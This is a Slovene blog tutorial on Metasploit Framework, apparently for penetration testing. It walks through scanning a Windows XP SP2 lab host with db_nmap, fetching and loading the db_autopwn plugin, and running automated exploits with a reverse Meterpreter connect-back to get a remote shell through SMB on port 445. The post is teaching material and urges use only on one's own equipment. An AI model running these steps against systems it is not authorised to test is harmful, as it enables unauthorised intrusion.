METASPLOIT FRAMEWORK

 

 

Povezava: http://www.metasploit.com/

 

Metasploit Framework je odprotkodno orodje za testiranje varnosti. Administratorji in skrbniki sami “napadajo” svoj IT sistem in preizkušajo njegovo varnost. Postopek imenujemo “pentesting”.

Paket je na voljo za Linux in Windows sisteme. Obstajata tudi verzije Metasploit Community in Pro, ki imata GUI za lažje delo.

 

 

Exploit je programska koda, ki je napisana izključno za namen izkoriščanje varnostnih lukenj. Z kodo povzročimo nepričakovano obnašanje programske opreme, kar omogoči nepooblaščen dostop do sistema. Vsi sistemi, programi…itd. imajo varnostne luknje, ki so bodisi posledica slabo napisane kode ali pa so narejeni namerno (backdoors). Backdoors omogočajo vstop nepooblaščenim uporabnikom v sistem brez vednosti lastnika.

Payload je programska koda, ki po izvršitvi “exploita” omogoča dostop in nadzor nad sistemom.

Auxiliary se uporablja za zbiranje informacij pred vdorom v sistem.

Encoders in Nops se uporabljajo za “bypass” požarnih zidov, IDS-jev, antvirusnih programov.

 

 

 

Ker je Metasploit Framework že naložen na BackTrack5 R2 operacijski sistem, bomo z njim prikazali osnovno delovanje.

 

1. Postavite se v direktorij:

root@bt:~# /opt/framework/msf3/

 

2. Prvo naredimo posodobitev:

root@bt:~/opt/framework/msf3/ ./msfupdate

 

3. Po posodobitvi se metasploit zažene avtomatsko. V primeru, da se ne, izvršite ukaz:

root@bt:~/opt/framework/msf3/ ./msfconsole

 

 

4. V našem primeru bomo iskalii varnostne luknje na operacijskem sistemu “Windows XP SP2”. Testiranje sistema je možno avtomatizirati z skripto “db_autopwn”. Za hranjenje podatkov bomo uporabili bazo Postgresql, ki je privzeta za msfkonozolo.

Če se želimo povezati na bazo moramo izvršiti ukaz: “db_connect -y /opt/metasploit/config/database.yml”. V datoteki “database.ym” je shranjena konfiguracija za povezavo z bazo (user, ime baze, geslo…)

5. Preverimo stanje povezave: “db_status”

 

6. Sedaj lahko skeniramo testni sistem z nmap in shranimo rezultate v bazo. To storimo z ukazom: “db_nmap -sS -sV -T5 -P0 -O 192.168.198.181”. Po končanem skeniranju vidimo dva odprta porta (445,137). Sedaj bomo poskušali izkoristi varnostne luknje v servisih, ki poslušajo na teh portih.

 

7. Če želimo testirati sistem z “db_autopwn”, moramo skripto prvo prenesti iz interneta, saj v novih verzijah Metasploit frameworka ni več podprta.

Prenos skripte: “wget http://raw.github.com/neinwecther/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb”

 

8. Sedaj prenešeno skripto skopirmo v direkotorij “/opt/metasploit/msf3/plugins” z ukazom:

“cp db_autopwn /opt/metasploit/msf3/plugins/”

 

9. Naložimo skripto v msfconsolo z ukazom: “load /opt/metasploit/msf3/plugins/db_autopwn.rb”

10. Sedaj bomo z skripto “db_autopwn” preverili vse možne ranljivosti na testnem sistemu (192.168.198.181).

Uporabite ukaz: “db_autopwn -p -t -e -r”

-p (match exploits to open ports)

-t (show exploits to be run)

-e (run exploits)

-r (connect back using reverse meterpreter payload)

Že med samim skeniranje lahko vidimo, da smo našli varnostno luknjo.

 

11. Ko se skirpta zaključi preverimo seje. Ukaz “sessions -l”

 

12. Sedaj se povežemo na testni sistem. Ukaz “sessions -i 1”

 

13. Za zagon cmd-ja vpišemo ukaz “shell”.

Sedaj smo se prijavili v Windows konzolo preko varnostne luknje v SMB servisu, ki posluša na portu 445.

Take varnostne luknje lahko uspešno zapremo z rednimi posodobitvami ( Microsoft Security Bulletin MS060-040 popravek za naš exploit).


Taka ali drugačna orodja uporabljajte zgolj za testiranje lastne varnosti in le na svoji opremi !!!

One Response to Metasploit framework

  • szybkie pozyczki says:

    Pretty! This was an incredibly wonderful post. Many thanks for supplying this info.

Leave a Reply

Your email address will not be published. Required fields are marked *

Internetna zaščita

Copyright © 2013. All Rights Reserved.